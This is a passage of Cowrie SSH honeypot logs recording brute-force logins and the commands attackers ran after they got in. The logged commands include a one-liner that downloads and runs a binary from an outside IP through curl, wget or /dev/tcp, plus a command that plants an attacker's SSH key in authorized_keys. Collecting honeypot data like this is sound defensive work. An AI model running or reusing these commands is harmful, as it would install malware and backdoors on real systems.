-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:59:08.422421Z","src_ip":"134.199.225.42","session":"34e1432db319"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T05:59:09.091422Z","src_ip":"134.199.225.42","session":"34e1432db319"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:59:10.251651Z","src_ip":"134.199.225.42","session":"34e1432db319"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":36426,"dst_ip":"1.2.3.4","dst_port":22,"session":"43e7277e964c","protocol":"ssh","message":"New connection: 134.199.225.42:36426 (1.2.3.4:22) [session: 43e7277e964c]","sensor":"my-vps","timestamp":"2025-08-26T05:59:10.409414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:59:10.410185Z","src_ip":"134.199.225.42","session":"43e7277e964c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:59:10.568607Z","src_ip":"134.199.225.42","session":"43e7277e964c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:59:11.242150Z","src_ip":"134.199.225.42","session":"43e7277e964c"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:59:11.400747Z","src_ip":"134.199.225.42","session":"0cd3393fa3f9"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:59:11.401885Z","src_ip":"134.199.225.42","session":"43e7277e964c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48550,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2b5ee06f636","protocol":"ssh","message":"New connection: 212.227.235.229:48550 (1.2.3.4:22) [session: a2b5ee06f636]","sensor":"my-vps","timestamp":"2025-08-26T05:59:48.538777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-russh_0.51.1","message":"Remote SSH version: SSH-2.0-russh_0.51.1","sensor":"my-vps","timestamp":"2025-08-26T05:59:48.539889Z","src_ip":"212.227.235.229","session":"a2b5ee06f636"}
{"eventid":"cowrie.client.kex","hassh":"1b8acd46a07d2dc9854db9ec4044c45c","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group18-sha512,diffie-hellman-group17-sha512,diffie-hellman-group16-sha512,diffie-hellman-group15-sha512,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,hmac-sha1-etm@openssh.com,hmac-sha1;none,zlib,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group18-sha512","diffie-hellman-group17-sha512","diffie-hellman-group16-sha512","diffie-hellman-group15-sha512","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-512-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-256","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none","zlib","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 1b8acd46a07d2dc9854db9ec4044c45c","sensor":"my-vps","timestamp":"2025-08-26T05:59:48.659922Z","src_ip":"212.227.235.229","session":"a2b5ee06f636"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T05:59:49.183530Z","src_ip":"212.227.235.229","session":"a2b5ee06f636"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:59:50.307344Z","src_ip":"212.227.235.229","session":"a2b5ee06f636"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:59:50.568064Z","src_ip":"212.227.235.229","session":"a2b5ee06f636"}
{"eventid":"cowrie.command.input","input":"echo 1 > /dev/null && cat /bin/echo","message":"CMD: echo 1 > /dev/null && cat /bin/echo","sensor":"my-vps","timestamp":"2025-08-26T05:59:50.571424Z","src_ip":"212.227.235.229","session":"a2b5ee06f636"}
{"eventid":"cowrie.command.input","input":"nohup $SHELL -c \"curl http://47.102.202.2:60125/linux -o /tmp/icRygBHJt1; if [ ! -f /tmp/icRygBHJt1 ]; then wget http://47.102.202.2:60125/linux -O /tmp/icRygBHJt1; fi; if [ ! -f /tmp/icRygBHJt1 ]; then exec 6<>/dev/tcp/47.102.202.2/60125 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/icRygBHJt1 ; chmod +x /tmp/icRygBHJt1 && /tmp/icRygBHJt1 fTVbHVe8SDRTv0scQSwJCiNfG0m+XThTvEsYQSQHBDteH0m0SzBMv0gKXiQGHiRYEle8TDhTvEoYVSMAASVaCky/UzJIvlcYWzsCBCVVHEm/TThduk4EVyweAiZdBEi2SDpLvkgZXjUBACJBG066UzJNu1cbWycKBiVeGk6uSTdTvEwbQS0EHiRaHEO4TTFNu1keWDsCAyxBG0C8UzFNuUMcXyQEADVXBEi7SC5MuFcYXSUKBiVeGE+uRTBTuUEEXSEDHiRZHUO4TTFPt1keWDsCBCZBH0GgTDNLtE8aXiYCECFYBEu6Ti5KvlcYWyUKBiVeG0yuRS5MvUEEXi0BHiJaEE++TDJMrk0dQS0GHiRYHVe/STVHuEkbXyYQBCJBG0u+UzVIoEoTVSMAASFdCk25UzFNvFcYXyceAi9ZGki8SCBJuVcSWTsCHiRbE0O4TTFPvFkTWjsEBzteHEigRDVHuEkbXCYQCCBBHE+gTDVTv0sbVSMAASZXCk25UzhLoEsEXiEJCiNfG0u8XThTv0oSQSEGHiReHkO4TTFJu1kYXSceByBBGUmgTjhHuEkbXSUQCDtdG06gTzFTv04fVSMAASVWCk25UzJJvVcfVzsBAyNVHEm/TjJduk4EVyweAiZdBEi2SDpLvkgZXjUEBztdGUCgTDlOoEgSXC8GACReGVm/SDRTt0gEVyYeASRVHEm/TjVduk4EVyMeASJZBEu+RDpLvkgZXDUIHiRcEle/RTFTuUwQWSUBAiRPHk6gRTNTv0EaQScECiNfG0u2tWtjSqkTwfS8ndBgDH6Fy8Q=; fi; echo password > /tmp/.opass; chmod +x /tmp/icRygBHJt1 && /tmp/icRygBHJt1 fTVbHVe8SDRTv0scQSwJCiNfG0m+XThTvEsYQSQHBDteH0m0SzBMv0gKXiQGHiRYEle8TDhTvEoYVSMAASVaCky/UzJIvlcYWzsCBCVVHEm/TThduk4EVyweAiZdBEi2SDpLvkgZXjUBACJBG066UzJNu1cbWycKBiVeGk6uSTdTvEwbQS0EHiRaHEO4TTFNu1keWDsCAyxBG0C8UzFNuUMcXyQEADVXBEi7SC5MuFcYXSUKBiVeGE+uRTBTuUEEXSEDHiRZHUO4TTFPt1keWDsCBCZBH0GgTDNLtE8aXiYCECFYBEu6Ti5KvlcYWyUKBiVeG0yuRS5MvUEEXi0BHiJaEE++TDJMrk0dQS0GHiRYHVe/STVHuEkbXyYQBCJBG0u+UzVIoEoTVSMAASFdCk25UzFNvFcYXyceAi9ZGki8SCBJuVcSWTsCHiRbE0O4TTFPvFkTWjsEBzteHEigRDVHuEkbXCYQCCBBHE+gTDVTv0sbVSMAASZXCk25UzhLoEsEXiEJCiNfG0u8XThTv0oSQSEGHiReHkO4TTFJu1kYXSceByBBGUmgTjhHuEkbXSUQCDtdG06gTzFTv04fVSMAASVWCk25UzJJvVcfVzsBAyNVHEm/TjJduk4EVyweAiZdBEi2SDpLvkgZXjUEBztdGUCgTDlOoEgSXC8GACReGVm/SDRTt0gEVyYeASRVHEm/TjVduk4EVyMeASJZBEu+RDpLvkgZXDUIHiRcEle/RTFTuUwQWSUBAiRPHk6gRTNTv0EaQScECiNfG0u2tWtjSqkTwfS8ndBgDH6Fy8Q=\" &","message":"CMD: nohup $SHELL -c \"curl http://47.102.202.2:60125/linux -o /tmp/icRygBHJt1; if [ ! -f /tmp/icRygBHJt1 ]; then wget http://47.102.202.2:60125/linux -O /tmp/icRygBHJt1; fi; if [ ! -f /tmp/icRygBHJt1 ]; then exec 6<>/dev/tcp/47.102.202.2/60125 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/icRygBHJt1 ; chmod +x /tmp/icRygBHJt1 && /tmp/icRygBHJt1 fTVbHVe8SDRTv0scQSwJCiNfG0m+XThTvEsYQSQHBDteH0m0SzBMv0gKXiQGHiRYEle8TDhTvEoYVSMAASVaCky/UzJIvlcYWzsCBCVVHEm/TThduk4EVyweAiZdBEi2SDpLvkgZXjUBACJBG066UzJNu1cbWycKBiVeGk6uSTdTvEwbQS0EHiRaHEO4TTFNu1keWDsCAyxBG0C8UzFNuUMcXyQEADVXBEi7SC5MuFcYXSUKBiVeGE+uRTBTuUEEXSEDHiRZHUO4TTFPt1keWDsCBCZBH0GgTDNLtE8aXiYCECFYBEu6Ti5KvlcYWyUKBiVeG0yuRS5MvUEEXi0BHiJaEE++TDJMrk0dQS0GHiRYHVe/STVHuEkbXyYQBCJBG0u+UzVIoEoTVSMAASFdCk25UzFNvFcYXyceAi9ZGki8SCBJuVcSWTsCHiRbE0O4TTFPvFkTWjsEBzteHEigRDVHuEkbXCYQCCBBHE+gTDVTv0sbVSMAASZXCk25UzhLoEsEXiEJCiNfG0u8XThTv0oSQSEGHiReHkO4TTFJu1kYXSceByBBGUmgTjhHuEkbXSUQCDtdG06gTzFTv04fVSMAASVWCk25UzJJvVcfVzsBAyNVHEm/TjJduk4EVyweAiZdBEi2SDpLvkgZXjUEBztdGUCgTDlOoEgSXC8GACReGVm/SDRTt0gEVyYeASRVHEm/TjVduk4EVyMeASJZBEu+RDpLvkgZXDUIHiRcEle/RTFTuUwQWSUBAiRPHk6gRTNTv0EaQScECiNfG0u2tWtjSqkTwfS8ndBgDH6Fy8Q=; fi; echo password > /tmp/.opass; chmod +x /tmp/icRygBHJt1 && /tmp/icRygBHJt1 fTVbHVe8SDRTv0scQSwJCiNfG0m+XThTvEsYQSQHBDteH0m0SzBMv0gKXiQGHiRYEle8TDhTvEoYVSMAASVaCky/UzJIvlcYWzsCBCVVHEm/TThduk4EVyweAiZdBEi2SDpLvkgZXjUBACJBG066UzJNu1cbWycKBiVeGk6uSTdTvEwbQS0EHiRaHEO4TTFNu1keWDsCAyxBG0C8UzFNuUMcXyQEADVXBEi7SC5MuFcYXSUKBiVeGE+uRTBTuUEEXSEDHiRZHUO4TTFPt1keWDsCBCZBH0GgTDNLtE8aXiYCECFYBEu6Ti5KvlcYWyUKBiVeG0yuRS5MvUEEXi0BHiJaEE++TDJMrk0dQS0GHiRYHVe/STVHuEkbXyYQBCJBG0u+UzVIoEoTVSMAASFdCk25UzFNvFcYXyceAi9ZGki8SCBJuVcSWTsCHiRbE0O4TTFPvFkTWjsEBzteHEigRDVHuEkbXCYQCCBBHE+gTDVTv0sbVSMAASZXCk25UzhLoEsEXiEJCiNfG0u8XThTv0oSQSEGHiReHkO4TTFJu1kYXSceByBBGUmgTjhHuEkbXSUQCDtdG06gTzFTv04fVSMAASVWCk25UzJJvVcfVzsBAyNVHEm/TjJduk4EVyweAiZdBEi2SDpLvkgZXjUEBztdGUCgTDlOoEgSXC8GACReGVm/SDRTt0gEVyYeASRVHEm/TjVduk4EVyMeASJZBEu+RDpLvkgZXDUIHiRcEle/RTFTuUwQWSUBAiRPHk6gRTNTv0EaQScECiNfG0u2tWtjSqkTwfS8ndBgDH6Fy8Q=\" &","sensor":"my-vps","timestamp":"2025-08-26T05:59:53.777923Z","src_ip":"212.227.235.229","session":"a2b5ee06f636"}
{"eventid":"cowrie.command.input","input":"head -c 3800636 > /tmp/BzcZnyJHbH","message":"CMD: head -c 3800636 > /tmp/BzcZnyJHbH","sensor":"my-vps","timestamp":"2025-08-26T05:59:53.782420Z","src_ip":"212.227.235.229","session":"a2b5ee06f636"}
{"eventid":"cowrie.command.input","input":"nohup $SHELL -c \"curl http://47.102.202.2:60125/linux -o /tmp/icRygBHJt1; if [ ! -f /tmp/icRygBHJt1 ]; then wget http://47.102.202.2:60125/linux -O /tmp/icRygBHJt1; fi; if [ ! -f /tmp/icRygBHJt1 ]; then exec 6<>/dev/tcp/47.102.202.2/60125 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/icRygBHJt1 ; chmod +x /tmp/icRygBHJt1 && /tmp/icRygBHJt1 fTVbHVe8SDRTv0scQSwJCiNfG0m+XThTvEsYQSQHBDteH0m0SzBMv0gKXiQGHiRYEle8TDhTvEoYVSMAASVaCky/UzJIvlcYWzsCBCVVHEm/TThduk4EVyweAiZdBEi2SDpLvkgZXjUBACJBG066UzJNu1cbWycKBiVeGk6uSTdTvEwbQS0EHiRaHEO4TTFNu1keWDsCAyxBG0C8UzFNuUMcXyQEADVXBEi7SC5MuFcYXSUKBiVeGE+uRTBTuUEEXSEDHiRZHUO4TTFPt1keWDsCBCZBH0GgTDNLtE8aXiYCECFYBEu6Ti5KvlcYWyUKBiVeG0yuRS5MvUEEXi0BHiJaEE++TDJMrk0dQS0GHiRYHVe/STVHuEkbXyYQBCJBG0u+UzVIoEoTVSMAASFdCk25UzFNvFcYXyceAi9ZGki8SCBJuVcSWTsCHiRbE0O4TTFPvFkTWjsEBzteHEigRDVHuEkbXCYQCCBBHE+gTDVTv0sbVSMAASZXCk25UzhLoEsEXiEJCiNfG0u8XThTv0oSQSEGHiReHkO4TTFJu1kYXSceByBBGUmgTjhHuEkbXSUQCDtdG06gTzFTv04fVSMAASVWCk25UzJJvVcfVzsBAyNVHEm/TjJduk4EVyweAiZdBEi2SDpLvkgZXjUEBztdGUCgTDlOoEgSXC8GACReGVm/SDRTt0gEVyYeASRVHEm/TjVduk4EVyMeASJZBEu+RDpLvkgZXDUIHiRcEle/RTFTuUwQWSUBAiRPHk6gRTNTv0EaQScECiNfG0u2tWtjSqkTwfS8ndBgDH6Fy8Q=; fi; echo password > /tmp/.opass; chmod +x /tmp/icRygBHJt1 && /tmp/icRygBHJt1 fTVbHVe8SDRTv0scQSwJCiNfG0m+XThTvEsYQSQHBDteH0m0SzBMv0gKXiQGHiRYEle8TDhTvEoYVSMAASVaCky/UzJIvlcYWzsCBCVVHEm/TThduk4EVyweAiZdBEi2SDpLvkgZXjUBACJBG066UzJNu1cbWycKBiVeGk6uSTdTvEwbQS0EHiRaHEO4TTFNu1keWDsCAyxBG0C8UzFNuUMcXyQEADVXBEi7SC5MuFcYXSUKBiVeGE+uRTBTuUEEXSEDHiRZHUO4TTFPt1keWDsCBCZBH0GgTDNLtE8aXiYCECFYBEu6Ti5KvlcYWyUKBiVeG0yuRS5MvUEEXi0BHiJaEE++TDJMrk0dQS0GHiRYHVe/STVHuEkbXyYQBCJBG0u+UzVIoEoTVSMAASFdCk25UzFNvFcYXyceAi9ZGki8SCBJuVcSWTsCHiRbE0O4TTFPvFkTWjsEBzteHEigRDVHuEkbXCYQCCBBHE+gTDVTv0sbVSMAASZXCk25UzhLoEsEXiEJCiNfG0u8XThTv0oSQSEGHiReHkO4TTFJu1kYXSceByBBGUmgTjhHuEkbXSUQCDtdG06gTzFTv04fVSMAASVWCk25UzJJvVcfVzsBAyNVHEm/TjJduk4EVyweAiZdBEi2SDpLvkgZXjUEBztdGUCgTDlOoEgSXC8GACReGVm/SDRTt0gEVyYeASRVHEm/TjVduk4EVyMeASJZBEu+RDpLvkgZXDUIHiRcEle/RTFTuUwQWSUBAiRPHk6gRTNTv0EaQScECiNfG0u2tWtjSqkTwfS8ndBgDH6Fy8Q=\" &#UPX!","message":"CMD: nohup $SHELL -c \"curl http://47.102.202.2:60125/linux -o /tmp/icRygBHJt1; if [ ! -f /tmp/icRygBHJt1 ]; then wget http://47.102.202.2:60125/linux -O /tmp/icRygBHJt1; fi; if [ ! -f /tmp/icRygBHJt1 ]; then exec 6<>/dev/tcp/47.102.202.2/60125 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/icRygBHJt1 ; chmod +x /tmp/icRygBHJt1 && /tmp/icRygBHJt1 fTVbHVe8SDRTv0scQSwJCiNfG0m+XThTvEsYQSQHBDteH0m0SzBMv0gKXiQGHiRYEle8TDhTvEoYVSMAASVaCky/UzJIvlcYWzsCBCVVHEm/TThduk4EVyweAiZdBEi2SDpLvkgZXjUBACJBG066UzJNu1cbWycKBiVeGk6uSTdTvEwbQS0EHiRaHEO4TTFNu1keWDsCAyxBG0C8UzFNuUMcXyQEADVXBEi7SC5MuFcYXSUKBiVeGE+uRTBTuUEEXSEDHiRZHUO4TTFPt1keWDsCBCZBH0GgTDNLtE8aXiYCECFYBEu6Ti5KvlcYWyUKBiVeG0yuRS5MvUEEXi0BHiJaEE++TDJMrk0dQS0GHiRYHVe/STVHuEkbXyYQBCJBG0u+UzVIoEoTVSMAASFdCk25UzFNvFcYXyceAi9ZGki8SCBJuVcSWTsCHiRbE0O4TTFPvFkTWjsEBzteHEigRDVHuEkbXCYQCCBBHE+gTDVTv0sbVSMAASZXCk25UzhLoEsEXiEJCiNfG0u8XThTv0oSQSEGHiReHkO4TTFJu1kYXSceByBBGUmgTjhHuEkbXSUQCDtdG06gTzFTv04fVSMAASVWCk25UzJJvVcfVzsBAyNVHEm/TjJduk4EVyweAiZdBEi2SDpLvkgZXjUEBztdGUCgTDlOoEgSXC8GACReGVm/SDRTt0gEVyYeASRVHEm/TjVduk4EVyMeASJZBEu+RDpLvkgZXDUIHiRcEle/RTFTuUwQWSUBAiRPHk6gRTNTv0EaQScECiNfG0u2tWtjSqkTwfS8ndBgDH6Fy8Q=; fi; echo password > /tmp/.opass; chmod +x /tmp/icRygBHJt1 && /tmp/icRygBHJt1 fTVbHVe8SDRTv0scQSwJCiNfG0m+XThTvEsYQSQHBDteH0m0SzBMv0gKXiQGHiRYEle8TDhTvEoYVSMAASVaCky/UzJIvlcYWzsCBCVVHEm/TThduk4EVyweAiZdBEi2SDpLvkgZXjUBACJBG066UzJNu1cbWycKBiVeGk6uSTdTvEwbQS0EHiRaHEO4TTFNu1keWDsCAyxBG0C8UzFNuUMcXyQEADVXBEi7SC5MuFcYXSUKBiVeGE+uRTBTuUEEXSEDHiRZHUO4TTFPt1keWDsCBCZBH0GgTDNLtE8aXiYCECFYBEu6Ti5KvlcYWyUKBiVeG0yuRS5MvUEEXi0BHiJaEE++TDJMrk0dQS0GHiRYHVe/STVHuEkbXyYQBCJBG0u+UzVIoEoTVSMAASFdCk25UzFNvFcYXyceAi9ZGki8SCBJuVcSWTsCHiRbE0O4TTFPvFkTWjsEBzteHEigRDVHuEkbXCYQCCBBHE+gTDVTv0sbVSMAASZXCk25UzhLoEsEXiEJCiNfG0u8XThTv0oSQSEGHiReHkO4TTFJu1kYXSceByBBGUmgTjhHuEkbXSUQCDtdG06gTzFTv04fVSMAASVWCk25UzJJvVcfVzsBAyNVHEm/TjJduk4EVyweAiZdBEi2SDpLvkgZXjUEBztdGUCgTDlOoEgSXC8GACReGVm/SDRTt0gEVyYeASRVHEm/TjVduk4EVyMeASJZBEu+RDpLvkgZXDUIHiRcEle/RTFTuUwQWSUBAiRPHk6gRTNTv0EaQScECiNfG0u2tWtjSqkTwfS8ndBgDH6Fy8Q=\" &#UPX!","sensor":"my-vps","timestamp":"2025-08-26T05:59:53.866317Z","src_ip":"212.227.235.229","session":"a2b5ee06f636"}
{"eventid":"cowrie.command.input","input":">A@/1'8ELF7}","message":"CMD: >A@/1'8ELF7}","sensor":"my-vps","timestamp":"2025-08-26T05:59:53.873161Z","src_ip":"212.227.235.229","session":"a2b5ee06f636"}
{"eventid":"cowrie.session.file_download","duplicate":false,"outfile":"var/lib/cowrie/downloads/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","destfile":"/dev/null","message":"Saved redir contents with SHA-256 4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 to var/lib/cowrie/downloads/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","sensor":"my-vps","timestamp":"2025-08-26T05:59:53.877658Z","src_ip":"212.227.235.229","session":"a2b5ee06f636"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/615e7a693c63867fd5aa28f3faa729773b158fd2932965ea04c17e7a41f02218","size":5385,"shasum":"615e7a693c63867fd5aa28f3faa729773b158fd2932965ea04c17e7a41f02218","duplicate":false,"duration":"3.3","message":"Closing TTY Log: var/lib/cowrie/tty/615e7a693c63867fd5aa28f3faa729773b158fd2932965ea04c17e7a41f02218 after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:59:53.879891Z","src_ip":"212.227.235.229","session":"a2b5ee06f636"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:59:53.885137Z","src_ip":"212.227.235.229","session":"a2b5ee06f636"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":47592,"dst_ip":"1.2.3.4","dst_port":22,"session":"45fee6db161d","protocol":"ssh","message":"New connection: 134.199.225.42:47592 (1.2.3.4:22) [session: 45fee6db161d]","sensor":"my-vps","timestamp":"2025-08-26T06:00:03.674151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:00:03.680883Z","src_ip":"134.199.225.42","session":"45fee6db161d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:00:03.838134Z","src_ip":"134.199.225.42","session":"45fee6db161d"}
{"eventid":"cowrie.login.success","username":"root","password":"penis","message":"login attempt [root/penis] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:00:04.533540Z","src_ip":"134.199.225.42","session":"45fee6db161d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:00:04.944920Z","src_ip":"134.199.225.42","session":"45fee6db161d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:00:04.946042Z","src_ip":"134.199.225.42","session":"45fee6db161d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:00:04.947701Z","src_ip":"134.199.225.42","session":"45fee6db161d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:00:05.105562Z","src_ip":"134.199.225.42","session":"45fee6db161d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:00:05.441097Z","src_ip":"134.199.225.42","session":"45fee6db161d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== 